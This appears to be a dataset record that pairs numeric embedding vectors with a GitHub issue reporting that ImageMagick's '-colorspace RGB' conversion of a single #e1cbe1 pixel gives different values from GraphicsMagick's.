0.0032330413814634085, 0.021255243569612503, -0.0027571029495447874, 0.005704581271857023, 0.012457897886633873, -0.020680777728557587, -0.02307215891778469, 0.0035904129035770893, -0.0018703545210883021, -0.0009844411397352815, 0.00832307804375887, 0.007989086210727692, 0.015724338591098785, -0.0021926567424088717, -0.013092482462525368, -0.01164963748306036, -0.018008843064308167, -0.020587259903550148, -0.013974220491945744, 0.002189316786825657, 0.009592247195541859, -0.011409162543714046, -0.005056637339293957, -0.018850501626729965, -0.008269638754427433, -0.013586790300905704, -0.007020509336143732, -0.005514205899089575, -0.01536362711340189, 0.011536079458892345, 0.005039937794208527, 0.01316596008837223, -0.013760466128587723, 0.025343304499983788, -0.02134876139461994, 0.004031281918287277, 0.021362120285630226, -0.004665866494178772, 0.00850343331694603, 0.01417461596429348, -0.010347068309783936, -0.019478406757116318, 0.01041386742144823, 0.010681060142815113, 0.0045422897674143314, 0.013426474295556545, 0.002075759693980217, 0.0007514817407354712, -0.024301249533891678, 0.006132090929895639, 0.003456816077232361, -0.016445759683847427, -0.015657540410757065, -0.012671652249991894, -0.013339635916054249, -0.0281889159232378, -0.00001630819679121487, -0.005096716340631247, 0.005567644722759724, -0.0026034668553620577, 0.04031950235366821, 0.007875529117882252, 0.007728572469204664, 0.004478831309825182, 0.004308495204895735, -0.0061454507522284985, 0.013459873385727406, -0.0077753313817083836, -0.019411608576774597, -0.003971163649111986, -0.009024460799992085, 0.0036071124486625195, -0.0034868752118200064, -0.00012305514246691018, 0.0009143027709797025, 0.011081851087510586, -0.020587259903550148, -0.004385313484817743, 0.011629597283899784, -0.0025166289415210485, 0.008510113693773746, -0.00302596646361053, -0.02339279279112816, -0.022898484021425247, -0.002591777127236128, -0.023219116032123566, -0.013947500847280025, 0.004068021196871996, -0.016953427344560623, -0.013533351011574268, -0.00361713208258152, -0.04336550831794739, 0.007494777906686068, -0.013974220491945744, 0.008877504616975784, -0.008763947524130344, -0.02228393964469433, -0.014588765799999237, 0.01210386585444212, -0.022858405485749245, 0.023553108796477318, -0.003737369319424033, -0.004348574206233025, 0.005567644722759724, 0.01632552407681942, 0.0034017073921859264, -0.014187975786626339, -0.00020477877114899457, -0.008383196778595448, -0.0028522906359285116, -0.006566280499100685, 0.004518910311162472, 0.011562799103558064, -0.017581332474946976, 0.004121460020542145, -0.007180825807154179, 0.014415089972317219, -0.022564491257071495, 0.0010019756155088544, 0.017193902283906937, -0.01083469670265913, -0.013894062489271164, 0.013346316292881966, -0.002977537689730525, 0.0030693854205310345, 0.005861557554453611, 0.021909868344664574, 0.025102829560637474, 0.01067438069730997, 0.00967908464372158, 0.006122071295976639, 0.020052872598171234, 0.019251292571425438, 0.0050699966959655285, -0.00727434316650033, 0.006576300133019686, 0.028776740655303, -0.021776271983981133, -0.003834226867184043, 0.0001216982927871868, -0.026959825307130814, -0.014855959452688694, 0.046812303364276886, 0.03767428547143936, -0.0011330675333738327, 0.0030810751486569643, 0.00705390889197588, 0.014762441627681255, 0.015617460943758488, 0.007321102079004049, -0.03388013690710068, -0.022444255650043488, -0.009572207927703857, -0.002120848512277007, -0.008543512783944607, 0.012257502414286137, -0.007815410383045673, 0.0012825288577005267, 0.02434132806956768, 0.014361651614308357, 0.002404741710051894, 0.03150211647152901, -0.022658009082078934, 0.00038847432006150484, 0.019037537276744843, -0.008436635136604309, 0.013947500847280025, -0.006041913293302059, 0.011870071291923523, -0.012805248610675335, 0.00826295930892229, -0.01587129384279251, -0.0003531964321155101, 0.030460059642791748, -0.001310083200223744, -0.005631103180348873, 0.01529682893306017, 0.009411890991032124, 0.02404741570353508, -0.0067566558718681335, -0.010841377079486847, -0.006840154062956572, -0.0013935811584815383, -0.003396697575226426, -0.00941857136785984, -0.020867813378572464, -0.016512559726834297, -0.008349796757102013, -0.008349796757102013, -0.02026662789285183, 0.0058782570995390415, -0.014281493611633778, 0.003864286234602332, -0.0014445149572566152, -0.01321271900087595, -0.013560070656239986, -0.00724094407632947, 0.005287091713398695, 0.00490300077944994, -0.009345092810690403, -0.011115250177681446, 0.011556119658052921, -0.018810423091053963, -0.03433436527848244, 0.0026602454017847776, -0.002092459239065647, -0.018235957249999046, -0.009117978624999523, -0.00931837409734726, 0.009445291012525558, -0.021562516689300537, -0.0037173298187553883, 0.0258776918053627, -0.016899989917874336, -0.007628374733030796, -0.002937458688393235, 0.02522306703031063, 0.014936117455363274, 0.0070806280709803104, -0.010333709418773651, 0.005430708173662424, 0.01766149140894413, 0.0016724644228816032, 0.00849007349461317, 0.0024130914825946093, 0.021749552339315414, -0.005059977062046528, 0.01225082203745842, 0.009699124842882156, -0.0005556790274567902, 0.029952391982078552, -0.012063787318766117, -0.013373035006225109, -0.007387900725007057, 0.02547690086066723, -0.015697618946433067, 0.007260983809828758, 0.004605748225003481, -0.014134536497294903, 0.010160033591091633, -0.011228807270526886, 0.004665866494178772, 0.013319596648216248, -0.028375951573252678, -0.014161256141960621, -0.01098165288567543, -0.005667842458933592, -0.005577664356678724, 0.022524412721395493, 0.017033586278557777, 0.00147624418605119, 0.009218175895512104, -0.013560070656239986, -0.00719418516382575, 0.02001279406249523, -0.009024460799992085, 0.04232345148921013, -0.011315645650029182, 0.0007852984126657248, -0.008590271696448326, -0.02687966637313366, 0.006295747123658657, 0.007922288030385971, -0.005560964811593294, -0.0022243859712034464, -0.012892086990177631, 0.0261315256357193, 0.016512559726834297, -0.017514534294605255, -0.03593752905726433, 0.0030326463747769594, 0.013239438645541668, -0.008429955691099167, -0.0010003057541325688, 0.016806472092866898, 0.010928214527666569, -0.003653871361166239, 0.02923097088932991, -0.0220568235963583, 0.02235073782503605, -0.013172640465199947, -0.006800075061619282, -0.020707497373223305, -0.015978172421455383, 0.005504186265170574, -0.009371812455356121, -0.027186939492821693, 0.003690610406920314, 0.005694561637938023, -0.026799509301781654, -0.0074212998151779175, 0.0024348008446395397, -0.005173534154891968, -0.016899989917874336, 0.007782010827213526, 0.004899661056697369, -0.013934141956269741, 0.008683789521455765, -0.004044641740620136, 0.001503798528574407, -0.006319126579910517, -0.003281470388174057, -0.003954464104026556, -0.009846081025898457, 0.016085049137473106, -0.015376986935734749, -0.016378961503505707, -0.00849007349461317, 0.010807977057993412, 0.015310187824070454, 0.008069244213402271, 0.01589801348745823, 0.009752563200891018, -0.023847021162509918, -0.010627621784806252, 0.01824931614100933, -0.0017133783549070358, 0.016205286607146263, -0.015924733132123947, -0.014228054322302341, 0.022992001846432686, 0.02368670515716076, 0.020480383187532425, -0.011442562565207481, -0.0071541061624884605, 0.007661773823201656, -0.017581332474946976, -0.012965565547347069, 0.0005903306882828474, 0.003415066981688142, -0.0058815972879529, -0.01942496746778488, -0.02166939340531826, -0.0029307787772268057, 0.013947500847280025, -0.01098165288567543, 0.013707026839256287, -0.020226549357175827, -0.006659798324108124, -0.006299086846411228, -0.018944019451737404, 0.006436023861169815, 0.006820114329457283, 0.0052102734334766865, 0.015844576060771942, -0.025142909958958626, 0.0093050142750144, 0.010600902140140533, 0.0023646624758839607, 0.016445759683847427, 0.03147539496421814, -0.005520885810256004, -0.01716718263924122, 0.003087755059823394, 0.011148649267852306, -0.00012900437286589295, -0.010233511216938496, -0.0038041674997657537, -0.0016532598529011011, 0.004448771942406893, 0.006676497869193554, -0.017968764528632164, -0.011709755286574364, 0.003453476121649146, -0.03345262631773949, -0.012224103324115276, 0.008222879841923714, -0.00601185392588377, 0.024661961942911148, -0.0008249599486589432, -0.03909040987491608, 0.009652365930378437, -0.013907422311604023, 0.003379998030140996, -0.00720086507499218, -0.0036605510395020247, -0.002344622975215316, 0.01694006845355034, -0.016285443678498268, -0.017808446660637856, 0.00032251092488877475, 0.007514817640185356, 0.010320349596440792, 0.007361181080341339, -0.01750117540359497, 0.021228523924946785, -0.0031445336062461138, -0.004528929945081472, 0.00242812093347311, 0.008904223330318928, 0.005403988528996706, 0.01544378511607647, -0.023472949862480164, -0.005500846542418003, -0.004495530854910612, 0.01433493196964264, -0.013787184841930866, -0.015924733132123947, 0.02941800467669964, -0.016886629164218903, -0.004535609856247902, -0.0010328699136152864, -0.0020156409591436386, -0.01824931614100933, 0.019037537276744843, -0.008703828789293766, -0.027948440983891487, -0.007574935909360647, 0.026412079110741615, 0.018596667796373367, 0.008991061709821224, -0.01557738147675991, 0.0008324747905135155, -0.00953212846070528, 0.014749081805348396, -0.02221713960170746, 0.022297298535704613, 0.005417348351329565, 0.025797532871365547, -0.012998964637517929, -0.022564491257071495, 0.013573430478572845, 0.00830971822142601, -0.024581803008913994, -0.031101325526833534, 0.000873388780746609, -0.008710508234798908, 0.015069713816046715, -0.004238356836140156, 0.0037106499075889587, -0.008169441483914852, -0.007521497551351786, 0.014789161272346973, 0.007073948159813881, 0.007982405833899975, -0.00961228646337986, -0.01983911730349064, -0.005627763457596302, 0.014695643447339535, -0.0022895142901688814, -0.021722832694649696, 0.008516793139278889, 0.005581004545092583, 0.005627763457596302, 0.023312633857131004, 0.008917583152651787, 0.006649778690189123, -0.0008429120061919093, 0.0016098408959805965, 0.015630820766091347, -0.017153823748230934, 0.010888135991990566, 0.003276460338383913, -0.007875529117882252, 0.005360569804906845, -0.005267051979899406, 0.014054378494620323, -0.0033699781633913517, -0.01060758251696825, 0.004271756391972303, -0.021362120285630226, -0.014855959452688694, 0.009331732988357544, -0.002932448871433735, -0.00716078607365489, 0.029444724321365356, -0.009632325731217861, 0.00971248373389244, 0.0076083349995315075, -0.004936400335282087, 0.0016766393091529608, -0.01847643218934536, -0.02443484589457512, 0.008850784972310066, -0.007888888008892536, -0.010614261962473392, -0.008236239664256573, -0.007267663720995188, 0.026572395116090775, 0.017514534294605255, -0.010053155943751335, 0.006980430334806442, 0.002563387854024768, 0.00039557163836434484, 0.021843070164322853, -0.01064098160713911, -0.012477937154471874, 0.0020657398272305727, -0.00922485627233982, 0.0017384277889505029, 0.010387147776782513, -0.006185529753565788, -0.012457897886633873, 0.006038573570549488, 0.013379715383052826, 0.015189951285719872, 0.016205286607146263, 0.02450164407491684, 0.00712738698348403, 0.021629314869642258, -0.005367249716073275, 0.004906340967863798, -0.012852007523179054, 0.008042524568736553, -0.020026152953505516, 0.011215447448194027, -0.015256749466061592, 0.015256749466061592, 0.015310187824070454, 0.009117978624999523, 0.005357230082154274, 0.009284974075853825, 0.010013076476752758, 0.00235464284196496, 0.00701382989063859, 0.038075074553489685, -0.01788860559463501, -0.022764887660741806, -0.014695643447339535, -0.010340388864278793, -0.015884654596447945, -0.0036071124486625195, -0.0045456294901669025, 0.0072943828999996185, 0.03975839540362358, -0.011776554398238659, -0.0188638623803854, -0.013332956470549107, 0.007394580636173487, 0.014415089972317219, -0.03305183723568916, 0.012017028406262398, 0.009785962291061878, -0.007594975642859936, -0.004348574206233025, -0.02936456725001335, 0.01068774051964283, -0.0076216948218643665, -0.019865836948156357, 0.019331449642777443, 0.0016457450110465288, 0.023406151682138443, 0.007033869158476591, 0.027414053678512573, -0.007361181080341339, -0.006222269032150507, -0.000670488690957427, 0.000060588216001633555, -0.0025116188917309046, -0.011335684917867184, 0.007594975642859936, -0.035403139889240265, -0.008837425149977207, -0.0013894062722101808, 0.010781258344650269, -0.011783233843743801, 0.005470787174999714, 0.00474936468526721, -0.009084579534828663, 0.017087025567889214, -0.022671369835734367, 0.008182801306247711, 0.008363156579434872, -0.01605832949280739, -0.01847643218934536, -0.015056353993713856, -0.02013303153216839, 0.008864144794642925, 0.006926991976797581, 0.006128751207143068, 0.008797346614301205, -0.019157774746418, -0.007067268248647451, -0.012811928987503052, -0.0017066985601559281, 0.01736757904291153, -0.013319596648216248, 0.001992261502891779, -0.0016699593979865313, -0.0031077945604920387, -0.004579028580337763, 0.004034622106701136, -0.007361181080341339, 0.012477937154471874, 0.021455638110637665, -0.001129727577790618, 0.004468811675906181, 0.006770015694200993, 0.011736474931240082, -0.04261736571788788, 0.00020540501282084733, 0.02235073782503605, 0.0022243859712034464, 0.006319126579910517, 0.005928356200456619, 0.005524225998669863, -0.014281493611633778, 0.012745130807161331, 0.01827603578567505, 0.0016348903300240636, 0.005581004545092583, 0.002822231501340866, -0.01668623462319374, 0.02001279406249523, -0.0013785514747723937, -0.0027220339979976416, 0.012604854069650173, -0.002760442905128002, -0.010393827222287655, 0.018756983801722527, -0.01850314997136593, 0.01213726494461298, -0.004498870577663183, 0.002743743360042572, 0.004158198833465576, -0.015042995102703571, -0.018957380205392838, -0.010433906689286232, 0.014949477277696133, -0.017541253939270973, -0.017621412873268127, 0.0056210835464298725, 0.018008843064308167, -0.0072943828999996185, -0.011723115108907223, -0.013593469746410847, 0.022978641092777252, -0.0011564468732103705, 0.01675303280353546, 0.01589801348745823, 0.0027220339979976416, 0.025623857975006104, 0.02893705666065216, 0.011916830204427242, 0.001845305203460157, 0.01172979548573494, 0.004572349134832621, -0.004836202599108219, -0.008316397666931152, -0.024167653173208237, -0.00812936294823885, -0.018169159069657326, -0.011262206360697746, -0.004963119514286518, -0.0025416782591491938, 0.025396743789315224, 0.025329945608973503, 0.01899745874106884, -0.01221742294728756, -0.0006483617471531034, 0.004589048679918051, 0.0017117083771154284, 0.001425310387276113, 0.0037039699964225292, -0.03470843657851219, -0.0093050142750144, -0.011001693084836006, -0.004792783409357071, 0.042430330067873, -0.0007489768322557211, 0.012805248610675335, -0.005474126897752285, -0.02219042181968689, -0.012230782769620419, -0.000895933248102665, 0.01332627609372139, -0.02212362363934517, -0.008750587701797485, 0.008349796757102013, 0.013379715383052826, 0.008643710054457188, -0.006118731573224068, -0.018356194719672203, -0.013433153741061687, 0.011816632933914661, -0.011429202742874622, -0.004265076480805874, 0.0026385358069092035, 0.015270109288394451, -0.005604384001344442, 0.012351020239293575, -0.0012775189243257046, -0.009264934808015823, 0.009345092810690403, 0.002493249485269189, 0.010086555033922195, 0.006242308299988508, -0.015884654596447945, 0.014575405977666378, -0.006379244849085808, 0.014000940136611462, -0.008964342065155506, -0.012511336244642735, 0.011789913289248943, -0.0022327357437461615, 0.026011288166046143, 0.0008107653120532632, -0.008189480751752853, 0.014642204158008099, -0.0097258435562253, -0.0054106684401631355, -0.0264254380017519, -0.009952958673238754, 0.02026662789285183, -0.0030092669185250998, 0.0025233086198568344, 0.025116190314292908, 0.019398249685764313, 0.017608052119612694, 0.0029725278727710247, -0.017020227387547493, 0.02284504473209381, 0.006840154062956572, -0.007147426251322031, -0.011061811819672585, -0.020373504608869553, 0.004849562421441078, 0.003309859661385417, -0.007387900725007057, -0.02134876139461994, -0.0056344433687627316, -0.015403705649077892, -0.02792172133922577, 0.018142439424991608, 0.010139993391931057, 0.0046859062276780605, -0.008904223330318928, 0.03575049340724945, -0.011816632933914661, -0.009639006108045578, 0.0040747011080384254, 0.009164737537503242, 0.009952958673238754, -0.03283808380365372, 0.022444255650043488, -0.013159280642867088, -0.010226831771433353, -0.03329231217503548, -0.006479442585259676, 0.00931837409734726, 0.002596786944195628, -0.002822231501340866, 0.010013076476752758, -0.006679837591946125, -0.010667701251804829, -0.004335214849561453, 0.005487486720085144, 0.02303208038210869, 0.010547463782131672, 0.007534856908023357, 0.002087449189275503, 0.004538949579000473, -0.0028639803640544415, -0.012163984589278698, -0.006482782773673534, -0.004111439920961857, 0.001338472473435104, 0.00030622881604358554, 0.006446043495088816, -0.0034067172091454268, -0.008783986791968346, 0.007347821723669767, -0.009485369548201561, 0.007414619904011488, -0.007708532735705376, -0.013459873385727406, -0.03225025534629822, 0.013920782133936882, -0.017247341573238373, 0.0165526382625103, 0.009993037208914757, -0.0074814180843532085, 0.00019235844956710935, -0.0022911843843758106, -0.0022076864261180162, 0.006800075061619282, 0.02166939340531826, -0.010106594301760197, -0.009699124842882156, -0.023793581873178482, 0.011275566183030605, -0.029738638550043106, 0.017968764528632164, 0.015083073638379574, 0.005701241549104452, 0.00735450116917491, 0.02137548103928566, 0.008783986791968346, 0.0006370895425789058, 0.005831498187035322, -0.006719916593283415, 0.012377738952636719, 0.007307742722332478, 0.00179186649620533, 0.014896037988364697, 0.0015480524161830544, 0.009345092810690403, 0.013139240443706512, -0.011362403631210327, 0.04098748415708542, -0.007635054644197226, -0.016726313158869743, 0.006178849842399359, 0.0008692138944752514, -0.012524696066975594, -0.020159751176834106, -0.0188638623803854, -0.037647563964128494, 0.03922400623559952, 0.014842599630355835, 0.009011100977659225, -0.015243389643728733, -0.006800075061619282, 0.001710038515739143, -0.013540031388401985, -0.0060318936593830585, -0.018155798316001892, 0.001042054733261466, 0.013159280642867088, 0.018596667796373367, -0.0005231148097664118, 0.002920759143307805, 0.012197383679449558, 0.00352695444598794, -0.005584344267845154, 0.004993178881704807, 0.018209237605333328, 0.009819361381232738, -0.04168218746781349, -0.03858274221420288, 0.0025249787140637636, 0.003493555122986436, 0.024528363719582558, 0.03371982276439667, 0.01046062633395195, 0.005597704090178013, 0.029792075976729393, -0.009244895540177822, -0.00476606423035264, 0.014815879985690117, 0.0009877809789031744, 0.006676497869193554, -0.010714460164308548, -0.00461242813616991, -0.005143475253134966, 0.0003074812702834606, 0.02114836685359478, -0.013540031388401985, 0.02547690086066723, -0.01535026729106903, 0.00832307804375887, -0.012571454979479313, -0.014308212324976921, 0.007107347249984741, -0.014762441627681255, 0.01207046676427126, -0.011315645650029182, 0.021335402503609657, 0.009959638118743896, 0.005871577188372612, 0.015096433460712433, -0.01448188815265894 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1.11 ### Operating system Linux ### Operating system, version and so on Gentoo linux ### Description While working on https://github.com/gap-packages/hap/issues/115, I noticed that imagemagick and graphicsmagick are producing different pixel values from `convert -colorspace RGB`. After narrowing it down to a one-pixel example, it looks like imagemagick is the one producing mysterious deviations. ### Steps to Reproduce 1. Create a single-pixel image whose RGB value is `#e1cbe1` 2. Save it as a bitmap with no colorspace information 3. Run `convert <infile> -colorspace RGB out.txt` 4. `out.txt` contains `0,0: (192,152,192) #C098C0 rgb(75.2941%,59.7208%,75.2941%)` (GraphicMagick, on the other hand, produces `0,0: (225,203,225) #E1CBE1`, which is correct.) ### Images _No response_
Conversion to text with -colorspace RGB produces wrong pixel values
https://api.github.com/repos/ImageMagick/ImageMagick/issues/7017/comments
6
2024-01-09T13:31:14
2024-01-09T17:04:21Z
https://github.com/ImageMagick/ImageMagick/issues/7017
2,072,376,840
7,017
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Conversion to text with -colorspace RGB produces wrong pixel values Issue date: --- start body --- ### ImageMagick version 7.1.1.11 ### Operating system Linux ### Operating system, version and so on Gentoo linux ### Description While working on https://github.com/gap-packages/hap/issues/115, I noticed that imagemagick and graphicsmagick are producing different pixel values from `convert -colorspace RGB`. After narrowing it down to a one-pixel example, it looks like imagemagick is the one producing mysterious deviations. ### Steps to Reproduce 1. Create a single-pixel image whose RGB value is `#e1cbe1` 2. Save it as a bitmap with no colorspace information 3. Run `convert <infile> -colorspace RGB out.txt` 4. `out.txt` contains `0,0: (192,152,192) #C098C0 rgb(75.2941%,59.7208%,75.2941%)` (GraphicMagick, on the other hand, produces `0,0: (225,203,225) #E1CBE1`, which is correct.) ### Images _No response_ --- end body ---
1,019
[ 0.013649862259626389, -0.02074521593749523, -0.010791117325425148, 0.025754457339644432, 0.00040844958857633173, 0.0412328876554966, 0.004490933381021023, 0.04741395637392998, -0.02840716578066349, -0.014203582890331745, -0.004664775915443897, 0.0021698130294680595, 0.008582673035562038, -0.0030197100713849068, -0.0075589329935610294, 0.005788314156234264, -0.014409618452191353, 0.031059876084327698, -0.0300554521381855, -0.016933554783463478, 0.010353291407227516, -0.02410617284476757, -0.0060201045125722885, 0.04798055440187454, -0.05189523100852966, 0.0009923514444380999, -0.016766151413321495, 0.0007263561710715294, 0.017435766756534576, -0.006290526129305363, 0.046538304537534714, 0.04759423807263374, 0.01877499930560589, 0.017113836482167244, 0.013315054588019848, -0.03932705521583557, 0.013649862259626389, 0.048650167882442474, 0.02856169268488884, 0.021376200020313263, -0.004127151798456907, -0.01713959127664566, 0.00902049895375967, 0.009381061419844627, -0.03739547356963158, -0.005608032923191786, 0.0023018047213554382, -0.03842565044760704, -0.00931023620069027, -0.02324339747428894, 0.006551289930939674, -0.026424072682857513, -0.011731155216693878, -0.015632955357432365, -0.0010712244547903538, -0.02297297492623329, 0.02660435438156128, 0.028664710000157356, 0.011499364860355854, 0.010359730571508408, -0.013546844944357872, 0.05019543692469597, -0.023603960871696472, -0.005559743382036686, -0.022045815363526344, -0.02614077366888523, -0.028381410986185074, -0.011145241558551788, 0.005637006834149361, -0.007803600747138262, 0.017551662400364876, 0.009503394365310669, 0.04293268173933029, 0.030879594385623932, 0.01768043451011181, 0.024827295914292336, 0.061604660004377365, -0.0071919322945177555, -0.03247636929154396, -0.011982261203229427, -0.02984941564500332, 0.030261486768722534, -0.026501337066292763, 0.048495642840862274, 0.031085629016160965, -0.0020362117793411016, -0.015735972672700882, -0.060007885098457336, -0.035978976637125015, 0.014705794863402843, -0.026913408190011978, 0.020011212676763535, -0.007481670007109642, -0.016263939440250397, 0.007919495925307274, 0.001530780573375523, -0.01541404239833355, -0.002541643101722002, -0.04648679494857788, -0.0016297742258757353, 0.01070097740739584, -0.015491305850446224, -0.003275644965469837, 0.0023645812179893255, 0.028510184958577156, -0.010469187051057816, -0.005234593525528908, -0.018684858456254005, 0.043602295219898224, 0.12990547716617584, 0.00611346447840333, 0.00376658933237195, -0.04393710568547249, -0.033712584525346756, -0.012516666203737259, 0.0069472650066018105, 0.02727396972477436, -0.006274429615586996, 0.002923130989074707, -0.02190416492521763, -0.034253429621458054, -0.009928342886269093, -0.00394365144893527, 0.0015468770870938897, -0.024479610845446587, 0.009818886406719685, -0.008318689651787281, -0.022123077884316444, -0.00847321655601263, -0.0005315880989655852, -0.008582673035562038, -0.01064302958548069, 0.021221673116087914, -0.004123932681977749, 0.001079272711649537, -0.0304417684674263, -0.044271912425756454, 0.04535359889268875, -0.004033791832625866, 0.009072007611393929, -0.0731426551938057, -0.04604896903038025, 0.02688765339553356, 0.03458823636174202, -0.03716368228197098, 0.007146861869841814, -0.025329507887363434, -0.009200779721140862, 0.011512242257595062, -0.016302570700645447, -0.02727396972477436, -0.0011822906089946628, 0.029566116631031036, 0.002591542201116681, 0.06299540400505066, -0.011055100709199905, 0.0304417684674263, -0.005401997361332178, -0.008994744159281254, -0.02268967591226101, -0.023758485913276672, -0.01152511965483427, 0.008460339158773422, -0.0008547260658815503, 0.010230958461761475, 0.0074365995824337006, -0.008595550432801247, 0.023938767611980438, -0.012928737327456474, 0.01488607656210661, 0.010765363462269306, 0.005154110956937075, -0.001691745943389833, -0.026655863970518112, -0.0598018504679203, -0.0004772622778546065, -0.014834566973149776, 0.007874425500631332, 0.008099776692688465, -0.03067355789244175, -0.006998773664236069, -0.02668161690235138, 0.01921282522380352, 0.010887696407735348, 0.010018483735620975, -0.024956069886684418, 0.015942009165883064, 0.00714042317122221, -0.00042293648584745824, -0.0012764552375301719, -0.0008957721875049174, 0.004078862257301807, 0.016688888892531395, -0.033712584525346756, 0.02097700536251068, 0.016766151413321495, -0.028123866766691208, -0.05521755665540695, 0.01070097740739584, -0.03067355789244175, 0.02218746580183506, -0.02195567451417446, -0.028690464794635773, -0.034176163375377655, 0.016534361988306046, 0.018955281004309654, -0.03803933411836624, 0.017577417194843292, 0.013469581492245197, -0.02681039087474346, -0.030699312686920166, -0.023191887885332108, 0.009973413310945034, 0.02487880550324917, -0.025561299175024033, 0.004349283874034882, 0.022406376898288727, 0.02879348397254944, -0.005675638560205698, 0.007571810390800238, 0.0067476676777005196, -0.008260741829872131, 0.005154110956937075, -0.025342386215925217, -0.011203188449144363, 0.012864351272583008, 0.02171100676059723, -0.002316291444003582, -0.035978976637125015, 0.005479260813444853, 0.017616048455238342, -0.04380832985043526, 0.008556918241083622, -0.005308637395501137, -0.017873592674732208, -0.004336406942456961, -0.0047516971826553345, 0.0029585433658212423, -0.06454066932201385, 0.009709429927170277, -0.02554842084646225, 0.0257029477506876, 0.010005606338381767, -0.008312251418828964, 0.030544785782694817, -0.02222609706223011, 0.01344382669776678, -0.03299146145582199, -0.013688494451344013, 0.027789060026407242, 0.02113153226673603, -0.03834838792681694, -0.01674039661884308, 0.010398361831903458, -0.0013931551948189735, -0.004584293346852064, 0.010887696407735348, 0.002948885317891836, 0.015491305850446224, -0.042906925082206726, 0.027557268738746643, 0.03427918255329132, -0.02276694029569626, -0.010572204366326332, 0.03451097384095192, -0.006097367964684963, -0.018517455086112022, -0.004764574579894543, -0.006599579472094774, 0.008125531487166882, 0.013521090149879456, -0.0400739349424839, -0.03675160929560661, -0.022200342267751694, -0.035515397787094116, 0.01146717183291912, 0.01152511965483427, -0.024518243968486786, 0.02178827114403248, -0.0308280847966671, 0.001279674586839974, 0.06757969409227371, -0.005376243032515049, 0.0020007994025945663, -0.0018044216558337212, 0.012529543600976467, -0.0004989926237612963, -0.008891725912690163, -0.06036844849586487, -0.042005520313978195, -0.013044632971286774, -0.013038193807005882, -0.011209627613425255, 0.009728746488690376, -0.03497455269098282, -0.05377530679106712, 0.0008732370915822685, -0.01842731423676014, 0.012774210423231125, 0.000422534067183733, -0.0030937541741877794, -0.023153256624937057, -0.00110824650619179, -0.0008386294939555228, -0.004107835702598095, 0.018723489716649055, -0.010507818311452866, 0.046692829579114914, 0.003383491886779666, -0.030622050166130066, 0.007185493595898151, -0.002858744701370597, 0.021891288459300995, -0.030879594385623932, -0.03554115071892738, -0.025690071284770966, 0.00860842689871788, -0.007410845253616571, 0.005730366799980402, -0.00034728276659734547, -0.01909692957997322, -0.02418343536555767, -0.023307783529162407, 0.02211020141839981, 0.03775603324174881, 0.01608365774154663, -0.040511760860681534, 0.02946309931576252, -0.061141081154346466, 0.01379151176661253, -0.017165346071124077, -0.02234199084341526, 0.021389076486229897, -0.022097324952483177, 0.028201131150126457, -0.04890771582722664, -0.036210767924785614, 0.017397135496139526, 0.038245368748903275, 0.0403829887509346, 0.01850457675755024, 0.03850291296839714, -0.02397739887237549, -0.02289571240544319, 0.02817537635564804, -0.04558539018034935, 0.0014245434431359172, 0.022625289857387543, 0.014808813109993935, 0.0029070342425256968, 0.0008804805111140013, 0.05176645889878273, -0.025368141010403633, 0.019341597333550453, -0.018375804647803307, 0.02280557155609131, -0.021466340869665146, -0.060625992715358734, 0.029952432960271835, -0.024041784927248955, 0.0006358131649903953, -0.01555569190531969, -0.003711861092597246, 0.011003592051565647, 0.003869607113301754, -0.003274035407230258, 0.04252060875296593, 0.010803994722664356, -0.00431387173011899, -0.002969810739159584, -0.009612850844860077, 0.032296087592840195, -0.05794752761721611, 0.03216731548309326, -0.03700915351510048, -0.019869564101099968, -0.006934387609362602, -0.0051251370459795, 0.021144408732652664, 0.014023302122950554, -0.048418380320072174, 0.005640225950628519, 0.013031755574047565, -0.049165260046720505, 0.028587447479367256, 0.025921860709786415, -0.004532784689217806, -0.0029327888041734695, 0.03631378337740898, -0.03690613806247711, -0.033712584525346756, -0.023616837337613106, -0.03162647411227226, -0.03971337154507637, -0.0023034142795950174, 0.07669677585363388, 0.02668161690235138, -0.016727520152926445, 0.02825263887643814, -0.012297753244638443, 0.010237396694719791, -0.06248031184077263, -0.0031661884859204292, -0.0010156914358958602, 0.01216898113489151, 0.05274512991309166, -0.014358109794557095, -0.047723010182380676, 0.03273391351103783, -0.008653497323393822, 0.006683281622827053, 0.04205702990293503, -0.012432964518666267, 0.0027653847355395555, -0.01555569190531969, -0.04422040283679962, -0.013830143958330154, 0.0308280847966671, 0.0064289565198123455, -0.009052691981196404, 0.023217642679810524, -0.024016031995415688, 0.0017400354845449328, 0.01054645050317049, -0.001022934797219932, -0.031008366495370865, 0.01815689168870449, 0.0004169002640992403, 0.046898867934942245, 0.0012989904498681426, -0.05521755665540695, -0.026784636080265045, 0.015877623111009598, -0.0055017960257828236, 0.0007879254408180714, 0.0034285620786249638, -0.02159511297941208, -0.010462747886776924, 0.012214051559567451, -0.013933161273598671, 0.02308887057006359, 0.039661865681409836, -0.0021939578000456095, -0.01457702275365591, -0.02464701607823372, 0.012967369519174099, -0.0303645059466362, 0.020552057772874832, -0.017513031139969826, -0.006606018170714378, 0.004809645004570484, 0.022020060569047928, -0.0036410363391041756, -0.027248214930295944, 0.013199158944189548, 0.01616092212498188, -0.022663922980427742, -0.017345627769827843, 0.03935281187295914, 0.0037054226268082857, -0.013379440642893314, -0.007249879650771618, -0.0413101501762867, -0.014409618452191353, 0.006792738102376461, 0.004606828559190035, 0.024119049310684204, -0.004629363771528006, 0.0027380206156522036, 0.013006000779569149, -0.015452674590051174, 0.0314461924135685, 0.0064836847595870495, -0.000995570793747902, 0.001599190873093903, 0.006119902711361647, -0.005797971971333027, 0.020294511690735817, 0.045920196920633316, -0.048495642840862274, 0.0005384291289374232, -0.06052297353744507, -0.03865744173526764, 0.015208006836473942, 0.035154834389686584, 0.009870395995676517, 0.0027782621327787638, -0.018440190702676773, -0.04798055440187454, 0.029205555096268654, 0.018517455086112022, 0.061295609921216965, 0.007945249788463116, -0.031214402988553047, -0.02053917944431305, 0.02015286311507225, -0.012967369519174099, -0.018556086346507072, 0.02887074649333954, 0.013353685848414898, 0.010359730571508408, -0.006274429615586996, -0.004239827394485474, -0.0014663944020867348, 0.03713792562484741, -0.018749244511127472, 0.0005223325570113957, 0.022509396076202393, -0.025767333805561066, -0.03332626819610596, 0.02402890846133232, -0.0514058955013752, -0.0045134685933589935, -0.02602487988770008, -0.008280058391392231, -0.0008812853484414518, 0.015529938042163849, -0.02117016352713108, 0.02422206662595272, 0.016366956755518913, -0.037189435213804245, -0.008582673035562038, 0.036725856363773346, 0.06392256170511246, 0.03690613806247711, 0.010803994722664356, 0.05470246821641922, 